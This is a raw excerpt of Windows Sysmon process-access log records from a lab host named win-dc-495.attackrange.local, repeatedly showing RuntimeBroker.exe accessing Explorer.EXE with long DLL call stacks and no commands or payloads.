e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75 10341000x800000000000000013071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac 10341000x800000000000000013070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe 10341000x800000000000000013067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+19cd9a|C:\Windows\System32\Windows.Storage.dll+10a787|C:\Windows\System32\Windows.Storage.dll+19ab19|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75 10341000x800000000000000013066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+10671b|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+10671b|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+10671b|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459 10341000x800000000000000013063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+10671b|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000013062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+1041d1|C:\Windows\System32\Windows.Storage.dll+1040a4|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+1041d1|C:\Windows\System32\Windows.Storage.dll+1040a4|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+1041d1|C:\Windows\System32\Windows.Storage.dll+1040a4|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000013059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+1041d1|C:\Windows\System32\Windows.Storage.dll+1040a4|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+1041d1|C:\Windows\System32\Windows.Storage.dll+104083|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+1041d1|C:\Windows\System32\Windows.Storage.dll+104083|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+1041d1|C:\Windows\System32\Windows.Storage.dll+104083|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000013055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+1041d1|C:\Windows\System32\Windows.Storage.dll+104083|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\Windows.Storage.dll+170f46|C:\Windows\System32\Windows.Storage.dll+1411fc|C:\Windows\System32\Windows.Storage.dll+140e39|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+1041d1|C:\Windows\System32\Windows.Storage.dll+104083|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+170f34|C:\Windows\System32\Windows.Storage.dll+1411fc|C:\Windows\System32\Windows.Storage.dll+140e39|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+1041d1|C:\Windows\System32\Windows.Storage.dll+104083|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000013052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
